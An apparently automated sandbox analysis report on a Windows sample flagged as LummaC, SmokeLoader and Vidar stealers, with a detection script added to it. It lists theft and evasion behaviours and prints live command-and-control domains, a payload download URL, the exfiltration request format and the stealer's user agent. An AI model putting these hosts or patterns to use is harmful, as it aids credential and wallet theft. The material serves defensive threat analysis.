Windows Analysis Report
3.exe

Overview

General Information

Sample name: 3.exe
Analysis ID: 1447653
MD5: eda6e5a44657001108351760d2425c80
SHA1: bff6e0250b689d1431e72f8cf070d115ba4720f9
SHA256: 7728eb47da1cbc7e34e79df27d3e9f47f0d5054baf0c9bfa3bb44ebafa9a6d6f
Tags: exe

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens network shares
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body. SMOKY SPIDER https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
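Turning the traffic patterns described in the three classification rows above into log-level detection logic, as an added example that is not part of the sandbox report: the indicators (the nine .shop domains, the four /tmp/index.php URLs, the Steam profile URL, the TeslaBrowser/5.5 user agent and the lid=%s&j=%s&ver=4.0 POST template) are the ones the configuration extractor and string decryptor recover later on this page; the JSON-lines log format and every sample line are constructed for illustration, and the lid/j parameter values are placeholders.

```python
"""Scan HTTP proxy log lines for the C2 patterns documented in this report.

Added example: indicators come from the report's extracted configuration and
decrypted strings; the log format and all log lines below are constructed.
"""
import json
import re
from urllib.parse import urlsplit

# LummaC C2 domains from the extracted configuration (build id swg5EG--).
LUMMA_C2 = {
    "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop",
    "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop",
    "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop",
}
LUMMA_UA = "TeslaBrowser/5.5"                                # decrypted string
LUMMA_BODY = re.compile(r"^lid=[^&]*&j=[^&]*&ver=4\.0$")      # "lid=%s&j=%s&ver=4.0"

# SmokeLoader C2 list from the extracted configuration.
SMOKELOADER_C2 = {
    "http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php",
    "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php",
}

# Vidar fetches its real C2 from a dead-drop profile on a legitimate site.
VIDAR_DEAD_DROP = "https://steamcommunity.com/profiles/76561199689717899"


def classify(entry):
    """Return (family, reason) for one parsed log entry, or None if nothing matches."""
    url = entry["url"]
    parts = urlsplit(url)
    host = parts.hostname or ""
    method = entry["method"].upper()
    ua = entry.get("user_agent") or ""
    body = entry.get("body") or ""

    if host in LUMMA_C2:
        strong = ua == LUMMA_UA or bool(LUMMA_BODY.match(body))
        return "LummaC", "configured C2 domain" + (" + TeslaBrowser UA/POST template" if strong else "")
    if ua == LUMMA_UA:
        return "LummaC", "TeslaBrowser/5.5 user agent on unlisted host"
    if url in SMOKELOADER_C2:
        return "SmokeLoader", "configured C2 URL"
    if method == "POST" and parts.path.endswith("/tmp/index.php") and not ua:
        # Behavioural fallback for hosts not in the extracted list.
        return "SmokeLoader", "POST to /tmp/index.php without User-Agent"
    if url == VIDAR_DEAD_DROP:
        return "Vidar", "dead-drop profile URL from configuration"
    if method == "POST" and not ua:
        return "Generic", "POST without User-Agent"
    return None


def scan(log_text):
    """Parse JSON-lines log text; return alerts keyed by 1-based line number."""
    alerts = {}
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        entry = json.loads(line)
        hit = classify(entry)
        if hit:
            alerts[n] = {"family": hit[0], "reason": hit[1], "url": entry["url"]}
    return alerts


# Constructed sample traffic (not from the sandbox capture); lid/j are placeholders.
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"method": "POST", "url": "https://whispedwoodmoodsksl.shop/api", "user_agent": LUMMA_UA,
     "body": "lid=PLACEHOLDER&j=PLACEHOLDER&ver=4.0", "status": 200},
    {"method": "POST", "url": "http://dbfhns.in/tmp/index.php", "user_agent": "",
     "body": "<opaque bytes>", "status": 404},
    {"method": "GET", "url": VIDAR_DEAD_DROP, "user_agent": BROWSER_UA, "body": "", "status": 200},
    {"method": "GET", "url": "https://www.microsoft.com/", "user_agent": BROWSER_UA, "body": "", "status": 200},
    {"method": "POST", "url": "https://intranet.example/login", "user_agent": BROWSER_UA,
     "body": "user=a", "status": 302},
])

if __name__ == "__main__":
    for n, a in sorted(scan(SAMPLE_LOG).items()):
        print(f"line {n}: {a['family']:<11} {a['reason']}  {a['url']}")
```

The Vidar rule is deliberately an exact-URL match: steamcommunity.com itself is legitimate, and only the profile ID from the configuration separates the dead-drop from ordinary browsing, so without process context a broader rule would be noise. The SmokeLoader fallback mirrors what the Snort alerts further down key on (repeated POSTs without a browser user agent) and will fire on hosts that were not in this particular configuration.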

AV Detection

Source: 3.exe Avira: detected
Source: whispedwoodmoodsksl.shop Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/( Avira URL Cloud: Label: malware
Source: http://45.129.96.86/file/update.exe Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/_o5e Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/r Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/%% Avira URL Cloud: Label: malware
Source: holicisticscrarws.shop Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\rcjjrra Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\Temp\A247.exe Avira: detection malicious, Label: TR/AVI.AceCrypter.javlp
Source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
Source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source: 5.3.A247.exe.7a0000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}
Source: whispedwoodmoodsksl.shop Virustotal: Detection: 17%
Source: dbfhns.in Virustotal: Detection: 5%
Source: https://whispedwoodmoodsksl.shop/( Virustotal: Detection: 15%
Source: https://65.109.242.59/s Virustotal: Detection: 13%
Source: http://guteyr.cc/tmp/index.php Virustotal: Detection: 12%
Source: https://65.109.242.59/r Virustotal: Detection: 6%
Source: https://65.109.242.59/K Virustotal: Detection: 6%
Source: http://45.129.96.86/file/update.exe Virustotal: Detection: 20%
Source: https://65.109.242.59/O Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Local\Temp\A247.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\rcjjrra ReversingLabs: Detection: 36%
Source: 3.exe Virustotal: Detection: 47%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\rcjjrra Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A247.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5358.exe Joe Sandbox ML: detected
Source: 3.exe Joe Sandbox ML: detected
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: boredimperissvieos.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: holicisticscrarws.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: sweetsquarediaslw.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: plaintediousidowsko.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: miniaturefinerninewjs.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: zippyfinickysofwps.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: obsceneclassyjuwks.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: acceptabledcooeprs.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: whispedwoodmoodsksl.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: swg5EG--
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0041537E CryptUnprotectData, 5_2_0041537E
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCEA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 9_2_6CCEA9A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCE44C0 PK11_PubEncrypt, 9_2_6CCE44C0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCE4440 PK11_PrivDecrypt, 9_2_6CCE4440
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCB4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 9_2_6CCB4420
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 9_2_6CD325B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCCE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 9_2_6CCCE6E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCEA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 9_2_6CCEA650
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCC8670 PK11_ExportEncryptedPrivKeyInfo, 9_2_6CCC8670
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD0A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 9_2_6CD0A730
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD10180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 9_2_6CD10180
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCE43B0 PK11_PubEncryptPKCS1,PR_SetError, 9_2_6CCE43B0

Compliance

Source: C:\Users\user\AppData\Local\Temp\A247.exe Unpacked PE file: 5.2.A247.exe.400000.0.unpack
Source: 3.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\3.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.67.133.187:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.9.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.9.dr
Source: Binary string: nss3.pdb@ source: kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
Source: Binary string: nss3.pdb source: kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
Source: Binary string: mozglue.pdb source: kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.9.dr
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esi+00000910h] 5_2_00427353
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esi+00000080h] 5_2_00427353
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_004168EF
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 5_2_00409960
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 5_2_00409960
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h] 5_2_00404970
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+00000084h] 5_2_00415FE1
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then dec edx 5_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 5_2_00417062
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+04h] 5_2_00417062
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00426174
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+54h] 5_2_004381BB
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00426271
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00426284
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 5_2_004102B2
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 5_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, 00008000h 5_2_00403570
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then cmp cl, 0000002Eh 5_2_00421580
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 5_2_004025A0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h 5_2_00414660
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edi, ebx 5_2_00436670
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 5_2_00431680
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+000000C0h] 5_2_004106B1
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h 5_2_004138D2
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 5_2_004248E0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+30h] 5_2_00423931
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+30h] 5_2_00423AD0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then jmp edx 5_2_00422AFB
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+4Ch] 5_2_00415AFA
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 5_2_0040CB10
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 5_2_0040FBB4
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then jmp edx 5_2_0041CCD0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+10h] 5_2_00423C97
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+08h] 5_2_00433D0A
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx esi, word ptr [ecx] 5_2_00438F15
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then jmp edx 5_2_0062D097
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx esi, word ptr [ecx] 5_2_0064917C
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+00000084h] 5_2_00626248
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then cmp cl, 0000002Eh 5_2_006312E0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 5_2_006272C9
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+04h] 5_2_006272C9
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then dec edx 5_2_0064B2B7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_006363DB
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_006364EB
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_006364D8
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 5_2_00620519
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esi+00000910h] 5_2_006375BA
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esi+00000080h] 5_2_006375BA
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 5_2_00626739
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, 00008000h 5_2_006137D7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 5_2_00612807
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 5_2_006418E7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h 5_2_006248C7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edi, ebx 5_2_006468D7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+000000C0h] 5_2_00620918
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 5_2_00634B47
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_00626B56
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 5_2_00619BC7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 5_2_00619BC7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 5_2_00634B47
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h] 5_2_00614BD7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+30h] 5_2_00633B98
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+000000A0h] 5_2_00631C89
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+4Ch] 5_2_00625D61
